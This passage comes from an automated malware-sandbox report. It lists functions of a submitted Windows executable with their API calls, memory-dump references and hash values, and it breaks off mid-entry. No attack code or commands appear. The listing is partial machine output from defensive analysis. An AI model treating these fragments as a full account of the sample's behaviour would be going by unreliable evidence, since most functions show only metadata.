                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(000000FF,?,?,00F0977F,?,?,00F095CF,?,?,?,?,?,00F32641,000000FF), ref: 00F0A1F1
                                                                            • Part of subcall function 00F0BB03: _wcslen.LIBCMT ref: 00F0BB27
                                                                          • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00F0977F,?,?,00F095CF,?,?,?,?,?,00F32641), ref: 00F0A21F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile$_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2643169976-0
                                                                          • Opcode ID: 1c9f306cb6e3b563f274b34efc84df68a5a6cbc7f128a8aa14eb9df671152e72
                                                                          • Instruction ID: f168e8c35f713bcaa909e64a74a26bc71513ec74626325b39ef64eaaa49ef8bd
                                                                          • Opcode Fuzzy Hash: 1c9f306cb6e3b563f274b34efc84df68a5a6cbc7f128a8aa14eb9df671152e72
                                                                          • Instruction Fuzzy Hash: A4E09A716402097BEB019F60DC85FEA3BACAF083D6F484021B944D20A4EB61DEC4FB60
                                                                          Function 00F1AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GdiplusShutdown.GDIPLUS(?,?,?,?,00F32641,000000FF), ref: 00F1ACB0
                                                                          • CoUninitialize.COMBASE(?,?,?,?,00F32641,000000FF), ref: 00F1ACB5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: GdiplusShutdownUninitialize
                                                                          • String ID:
                                                                          • API String ID: 3856339756-0
                                                                          • Opcode ID: 652208c6eee851c2391a72c54382bb5f897e84e1a5ea6c72d45b5549bd7ebb39
                                                                          • Instruction ID: 7e5dc76622e471f046903a04cea4072720638379e6066dc906fb374a3a1eac7f
                                                                          • Opcode Fuzzy Hash: 652208c6eee851c2391a72c54382bb5f897e84e1a5ea6c72d45b5549bd7ebb39
                                                                          • Instruction Fuzzy Hash: 6FE06D72604654EFCB00DB59DC06B4AFBA9FB89F30F00426AF816D37A1CB74B841DA90
                                                                          Function 00F0A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00F0A23A,?,00F0755C,?,?,?,?), ref: 00F0A254
                                                                            • Part of subcall function 00F0BB03: _wcslen.LIBCMT ref: 00F0BB27
                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00F0A23A,?,00F0755C,?,?,?,?), ref: 00F0A280
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile$_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2673547680-0
                                                                          • Opcode ID: 332cabab021085b53e879a1a8df39087e51030736dd44be82d951880f1efd973
                                                                          • Instruction ID: 6754366fa21270d33f1a9afd182280b841e28ad48492e4cecf7115332835ea13
                                                                          • Opcode Fuzzy Hash: 332cabab021085b53e879a1a8df39087e51030736dd44be82d951880f1efd973
                                                                          • Instruction Fuzzy Hash: 9AE092719001285BDB10EB64CC05BD97798AB083F5F0442B1FD44E31D0D770DE84EAE0
                                                                          Function 00F1DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _swprintf.LIBCMT ref: 00F1DEEC
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                          • SetDlgItemTextW.USER32(00000065,?), ref: 00F1DF03
                                                                            • Part of subcall function 00F1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1B579
                                                                            • Part of subcall function 00F1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1B58A
                                                                            • Part of subcall function 00F1B568: IsDialogMessageW.USER32(0001045C,?), ref: 00F1B59E
                                                                            • Part of subcall function 00F1B568: TranslateMessage.USER32(?), ref: 00F1B5AC
                                                                            • Part of subcall function 00F1B568: DispatchMessageW.USER32(?), ref: 00F1B5B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                          • String ID:
                                                                          • API String ID: 2718869927-0
                                                                          • Opcode ID: e58227a60a8aa600e51cbf236a5c4617826d86ba00fcbb694124ab75d341214e
                                                                          • Instruction ID: fd1edb5e1ade34f5e8e26634d8da85c739834d29619db96928974742729ecb72
                                                                          • Opcode Fuzzy Hash: e58227a60a8aa600e51cbf236a5c4617826d86ba00fcbb694124ab75d341214e
                                                                          • Instruction Fuzzy Hash: 90E09BB550024C66DF01A760DC06FDE376C5B157C5F040851B700D60F3D97DEA51B761
                                                                          Function 00F1081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F10836
                                                                          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0F2D8,Crypt32.dll,00000000,00F0F35C,?,?,00F0F33E,?,?,?), ref: 00F10858
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryLibraryLoadSystem
                                                                          • String ID:
                                                                          • API String ID: 1175261203-0
                                                                          • Opcode ID: e040b852b77b58c4cfa03076b18cdda538915ff4f7e1194d39f35803637cd5f0
                                                                          • Instruction ID: 82641d945e7f1dc232842ffa22e65ca42466512f480b1061e7f8ba849fafb0b3
                                                                          • Opcode Fuzzy Hash: e040b852b77b58c4cfa03076b18cdda538915ff4f7e1194d39f35803637cd5f0
                                                                          • Instruction Fuzzy Hash: D8E048B690011C6BDB11A794DC45FDA77ACEF093E2F0400657645D2044DA74DAC4DFF0
                                                                          Function 00F1A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F1A3DA
                                                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00F1A3E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: BitmapCreateFromGdipStream
                                                                          • String ID:
                                                                          • API String ID: 1918208029-0
                                                                          • Opcode ID: 50ffab6009b0d24bfce6870046e721f8f3ef5d3a07fc7218dde1ddba0ef83442
                                                                          • Instruction ID: 5612759940c789ec47a5bdbfc9bc795d20b715559a8da1b23ef8567d25ee29b1
                                                                          • Opcode Fuzzy Hash: 50ffab6009b0d24bfce6870046e721f8f3ef5d3a07fc7218dde1ddba0ef83442
                                                                          • Instruction Fuzzy Hash: 21E0ED71905218EBCB10DF55C9417D9BBE8EB04364F10805AA85693201E374BE44FB91
                                                                          Function 00F22B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F22BAA
                                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00F22BB5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                          • String ID:
                                                                          • API String ID: 1660781231-0
                                                                          • Opcode ID: 84b718c28d86c88528379fa8fdd592f29e9d68c35ef0e4d2702c5ce906724bd9
                                                                          • Instruction ID: 6995c136db31b8513c9138d81448ad8d3c0a9d9d79647ebd82defce7dcd536c9
                                                                          • Opcode Fuzzy Hash: 84b718c28d86c88528379fa8fdd592f29e9d68c35ef0e4d2702c5ce906724bd9
                                                                          • Instruction Fuzzy Hash: 51D02275998334384CE42EB03C1764D3386BEC1B717E0039AF830998C1EE1CC040B022
                                                                          Function 00F012F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ItemShowWindow
                                                                          • String ID:
                                                                          • API String ID: 3351165006-0
                                                                          • Opcode ID: 789997610b21aba33df8a69dedbeafa80957c9de775c3b2b7a078c79e8eab577
                                                                          • Instruction ID: 6d4e9f03f8c7aa60409047e6d0d482e2551a3deee4a5c60cbffee9eb4f9addf5
                                                                          • Opcode Fuzzy Hash: 789997610b21aba33df8a69dedbeafa80957c9de775c3b2b7a078c79e8eab577
                                                                          • Instruction Fuzzy Hash: 0CC0123285C228BECB010BB4DC09C2BBBA8ABA7312F04C908F0B5C0060C238C110FB11
                                                                          Function 00F01A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: 7ebc8419ea007270c0e5bbe19aec7d881ae2645772c1bbb6cde5b32b33f38978
                                                                          • Instruction ID: 4720163b86b43193eafdaf325179b89807209d2898ae7fa7b39bfbb644202af6
                                                                          • Opcode Fuzzy Hash: 7ebc8419ea007270c0e5bbe19aec7d881ae2645772c1bbb6cde5b32b33f38978
                                                                          • Instruction Fuzzy Hash: BBC1BF70E002549FEF29DF68C884BA97BA5BF45320F0841B9EC469B2D2DB349944FB61
                                                                          Function 00F03BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: d5124253043642d7af88726c76e3a65db055297040c9f93093bbabc52595b769
                                                                          • Instruction ID: 8e85daf2c106fabe6490199ae95570615bbf99ec55032a1daec64f197fa3e33e
                                                                          • Opcode Fuzzy Hash: d5124253043642d7af88726c76e3a65db055297040c9f93093bbabc52595b769
                                                                          • Instruction Fuzzy Hash: 3671D371500B859EDB35DB70CC55AE7F7E9AF14300F40492EE6AB87282DA366688FF11
                                                                          Function 00F08284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F08289
                                                                            • Part of subcall function 00F013DC: __EH_prolog.LIBCMT ref: 00F013E1
                                                                            • Part of subcall function 00F0A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00F0A598
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog$CloseFind
                                                                          • String ID:
                                                                          • API String ID: 2506663941-0
                                                                          • Opcode ID: f791d810880c7b742aacb4b3d2486728a80aa5aef8e7e119eda93e5ed3c6347f
                                                                          • Instruction ID: ea9964efd1c06d7ea4151dc80b4be873db0298e042d716720f3ccdc14f7b1adb
                                                                          • Opcode Fuzzy Hash: f791d810880c7b742aacb4b3d2486728a80aa5aef8e7e119eda93e5ed3c6347f
                                                                          • Instruction Fuzzy Hash: 2C41C471D446589ADB20DBA0CC55AEAB7B8BF40344F4404EAE58A970C3EB795EC5FB10
                                                                          Function 00F013E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F013E1
                                                                            • Part of subcall function 00F05E37: __EH_prolog.LIBCMT ref: 00F05E3C
                                                                            • Part of subcall function 00F0CE40: __EH_prolog.LIBCMT ref: 00F0CE45
                                                                            • Part of subcall function 00F0B505: __EH_prolog.LIBCMT ref: 00F0B50A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: a61d294448c23fbf9c190e06e6cc36eb529737506b0ab5b2ba34c7daa273ba18
                                                                          • Instruction ID: 530f2e8f38a6feb71237e0640ed14388444e19515431a6b7b84182af1b9cf5ec
                                                                          • Opcode Fuzzy Hash: a61d294448c23fbf9c190e06e6cc36eb529737506b0ab5b2ba34c7daa273ba18
                                                                          • Instruction Fuzzy Hash: 614149B0905B40DEE724CF398885AE6FBE5BF19310F544A2ED5FE83282CB756654EB10
                                                                          Function 00F013DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F013E1
                                                                            • Part of subcall function 00F05E37: __EH_prolog.LIBCMT ref: 00F05E3C
                                                                            • Part of subcall function 00F0CE40: __EH_prolog.LIBCMT ref: 00F0CE45
                                                                            • Part of subcall function 00F0B505: __EH_prolog.LIBCMT ref: 00F0B50A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: b522aa9395654821d2465040a9ef5b186b8e436e913f7e57ddd6c9bb5194b6d5
                                                                          • Instruction ID: 342ceb85b110ee5bd7f7bf72e6b6a867e976a60e28660bf15adb0279db2b9d5b
                                                                          • Opcode Fuzzy Hash: b522aa9395654821d2465040a9ef5b186b8e436e913f7e57ddd6c9bb5194b6d5
                                                                          • Instruction Fuzzy Hash: BA4167B0905B409EE724CF398885AE6FBE5BF19310F544A2ED5FE83282CB752654EB10
                                                                          Function 00F1B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F1B098
                                                                            • Part of subcall function 00F013DC: __EH_prolog.LIBCMT ref: 00F013E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: d0975b6bf51cbb07411406ded4ba264334c8ad7c7eefb481e3be5b5b1185aa43
                                                                          • Instruction ID: 5974935e463e731e78ec8a53d3d5e71dcd9f87854a830cbb89ff7a67be5f2334
                                                                          • Opcode Fuzzy Hash: d0975b6bf51cbb07411406ded4ba264334c8ad7c7eefb481e3be5b5b1185aa43
                                                                          • Instruction Fuzzy Hash: A1316D75C04249EACF15DF64DC519EEB7B4AF09300F10449EE809B7282D739AE44EBA1
                                                                          Function 00F2AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00F2ACF8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID:
                                                                          • API String ID: 190572456-0
                                                                          • Opcode ID: 5bd7a1e1e027f15addc866b37475889c4ea5c53f0b5118f7d96e03fae7a0e963
                                                                          • Instruction ID: 24db7a63f9a2ce949889ab868024a36bca9cdd9ae792bbda5bb9b116d4e4bae2
                                                                          • Opcode Fuzzy Hash: 5bd7a1e1e027f15addc866b37475889c4ea5c53f0b5118f7d96e03fae7a0e963
                                                                          • Instruction Fuzzy Hash: AB11A333A416399F9B269E2CFC4095A7396AB843707564221ED25EB294D734EC01A7D2
                                                                          Function 00F09215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
